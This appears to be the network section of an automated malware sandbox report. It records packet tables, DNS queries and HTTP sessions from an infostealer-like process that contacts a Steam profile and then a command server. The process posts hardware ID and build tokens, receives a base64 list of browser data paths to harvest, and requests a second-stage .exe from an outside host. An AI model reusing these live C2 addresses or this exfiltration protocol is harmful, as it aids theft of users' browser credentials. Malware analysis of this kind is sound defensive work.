                                                                                                                          Oct 3, 2024 03:27:14.418009996 CEST57965443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:14.418040037 CEST57965443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:14.421746016 CEST57965443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:14.421766043 CEST4435796549.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:14.954544067 CEST57966443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:14.954591990 CEST4435796649.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:14.954659939 CEST57966443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:14.955250025 CEST57966443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:14.955265999 CEST4435796649.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:15.636672974 CEST4435796649.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:15.636740923 CEST57966443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:15.637255907 CEST57966443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:15.637267113 CEST4435796649.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:15.638896942 CEST57966443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:15.638901949 CEST4435796649.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:16.348905087 CEST4435796649.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:16.348968029 CEST57966443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:16.348982096 CEST4435796649.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:16.349028111 CEST57966443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:16.349088907 CEST4435796649.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:16.349133968 CEST57966443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:16.349802971 CEST57966443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:16.349814892 CEST4435796649.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:17.001512051 CEST57968443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:17.001554966 CEST4435796849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:17.001642942 CEST57968443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:17.001880884 CEST57968443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:17.001898050 CEST4435796849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:17.744631052 CEST4435796849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:17.744774103 CEST57968443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:17.745477915 CEST57968443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:17.745486021 CEST4435796849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:17.747668982 CEST57968443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:17.747678995 CEST4435796849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:17.747785091 CEST57968443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:17.747797012 CEST4435796849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:17.747803926 CEST57968443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:17.747807980 CEST4435796849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:17.747864008 CEST57968443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:17.747864008 CEST57968443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:17.747870922 CEST4435796849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:17.747884035 CEST4435796849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:17.747904062 CEST57968443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:17.747915983 CEST4435796849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:17.747984886 CEST57968443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:17.747992992 CEST4435796849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:17.748008013 CEST57968443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:17.748018026 CEST4435796849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:17.748081923 CEST57968443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:17.748101950 CEST57968443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:17.748115063 CEST57968443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:17.748173952 CEST4435796849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:19.222078085 CEST4435796849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:19.222171068 CEST57968443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:19.222179890 CEST4435796849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:19.222242117 CEST57968443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:19.222522974 CEST57968443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:19.222567081 CEST4435796849.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:19.260540009 CEST57969443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:19.260574102 CEST4435796949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:19.260647058 CEST57969443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:19.261132956 CEST57969443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:19.261146069 CEST4435796949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:20.454272985 CEST4435796949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:20.454725027 CEST57969443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:20.454762936 CEST57969443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:20.454767942 CEST4435796949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:20.456578016 CEST57969443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:20.456583023 CEST4435796949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:21.513242960 CEST4435796949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:21.513335943 CEST4435796949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:21.513385057 CEST57969443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:21.513385057 CEST57969443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:21.513756037 CEST57969443192.168.2.749.12.197.9
                                                                                                                          Oct 3, 2024 03:27:21.513772964 CEST4435796949.12.197.9192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:21.518054008 CEST5797080192.168.2.7147.45.44.104
                                                                                                                          Oct 3, 2024 03:27:21.602935076 CEST8057970147.45.44.104192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:21.603020906 CEST5797080192.168.2.7147.45.44.104
                                                                                                                          Oct 3, 2024 03:27:21.603456020 CEST5797080192.168.2.7147.45.44.104
                                                                                                                          Oct 3, 2024 03:27:21.634083986 CEST8057970147.45.44.104192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:22.257582903 CEST8057970147.45.44.104192.168.2.7
                                                                                                                          Oct 3, 2024 03:27:22.257644892 CEST5797080192.168.2.7147.45.44.104

                                                                                                                          UDP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Oct 3, 2024 03:26:37.956768036 CEST53553811.1.1.1192.168.2.7
                                                                                                                          Oct 3, 2024 03:26:41.112675905 CEST6162853192.168.2.71.1.1.1
                                                                                                                          Oct 3, 2024 03:26:41.140671968 CEST53616281.1.1.1192.168.2.7

                                                                                                                          DNS Queries

                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Oct 3, 2024 03:26:41.112675905 CEST192.168.2.71.1.1.10x4f36Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                          DNS Answers

                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Oct 3, 2024 03:26:41.140671968 CEST1.1.1.1192.168.2.70x4f36No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false

                                                                                                                          HTTP Request Dependency Graph

                                                                                                                          • steamcommunity.com
                                                                                                                          • 49.12.197.9
                                                                                                                          • 147.45.44.104

                                                                                                                          HTTP Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.757970147.45.44.104807620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 3, 2024 03:27:21.603456020 CEST183OUTGET /ldms/a43486128347.exe HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 147.45.44.104
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Oct 3, 2024 03:27:22.257582903 CEST314INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:27:22 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 13
                                                                                                                          Last-Modified: Thu, 03 Oct 2024 01:25:21 GMT
                                                                                                                          Connection: keep-alive
                                                                                                                          Keep-Alive: timeout=120
                                                                                                                          ETag: "66fdf281-d"
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Data Raw: 55 6e 6b 6e 6f 77 6e 20 65 72 72 6f 72
                                                                                                                          Data Ascii: Unknown error


                                                                                                                          HTTPS Proxied Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.757946104.102.49.2544437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-03 01:26:42 UTC119OUTGET /profiles/76561199780418869 HTTP/1.1
                                                                                                                          Host: steamcommunity.com
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:26:42 UTC1870INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Date: Thu, 03 Oct 2024 01:26:42 GMT
                                                                                                                          Content-Length: 34879
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: sessionid=3fa6e5fec03c50e224752d71; Path=/; Secure; SameSite=None
                                                                                                                          Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                          2024-10-03 01:26:42 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                          2024-10-03 01:26:42 UTC16384INData Raw: 52 54 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34
                                                                                                                          Data Ascii: RT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4
                                                                                                                          2024-10-03 01:26:42 UTC3768INData Raw: 75 6d 6d 61 72 79 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72
                                                                                                                          Data Ascii: ummary"></div><div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><scr
                                                                                                                          2024-10-03 01:26:42 UTC213INData Raw: 63 6b 3d 22 52 65 73 70 6f 6e 73 69 76 65 5f 52 65 71 75 65 73 74 4d 6f 62 69 6c 65 56 69 65 77 28 29 22 3e 0d 0a 09 09 09 09 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                          Data Ascii: ck="Responsive_RequestMobileView()"><span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.75794749.12.197.94437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-03 01:26:43 UTC184OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:26:43 UTC158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:26:43 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          2024-10-03 01:26:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.75794849.12.197.94437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-03 01:26:44 UTC276OUTPOST / HTTP/1.1
                                                                                                                          Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKF
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Content-Length: 256
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:26:44 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 31 39 36 34 30 39 39 32 31 32 32 30 34 30 34 30 39 34 30 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 44 42 4b 46 2d 2d 0d
                                                                                                                          Data Ascii: ------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="hwid"8819640992122040409402-a33c7340-61ca------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------FBKFCFBFIDGCGDHJDBKF--
                                                                                                                          2024-10-03 01:26:45 UTC158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:26:45 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          2024-10-03 01:26:45 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 36 31 36 65 33 37 37 32 34 35 61 32 62 33 36 66 66 65 64 66 32 66 37 65 66 37 33 32 63 30 34 35 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 3a1|1|1|1|616e377245a2b36ffedf2f7ef732c045|1|1|1|0|0|50000|10


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.75794949.12.197.94437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-03 01:26:46 UTC276OUTPOST / HTTP/1.1
                                                                                                                          Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDB
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Content-Length: 331
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:26:46 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 36 65 33 37 37 32 34 35 61 32 62 33 36 66 66 65 64 66 32 66 37 65 66 37 33 32 63 30 34 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74
                                                                                                                          Data Ascii: ------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="token"616e377245a2b36ffedf2f7ef732c045------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------GIEBFHCAKFBGDHIDHIDBCont
                                                                                                                          2024-10-03 01:26:46 UTC158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:26:46 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          2024-10-03 01:26:46 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                          Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.75795049.12.197.94437620C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-03 01:26:47 UTC276OUTPOST / HTTP/1.1
                                                                                                                          Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDB
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Content-Length: 331
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:26:47 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 36 65 33 37 37 32 34 35 61 32 62 33 36 66 66 65 64 66 32 66 37 65 66 37 33 32 63 30 34 35 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74
                                                                                                                          Data Ascii: ------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="token"616e377245a2b36ffedf2f7ef732c045------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------IDAKJKEHDBGHIDHIEHDBCont
                                                                                                                          2024-10-03 01:26:48 UTC158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:26:48 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
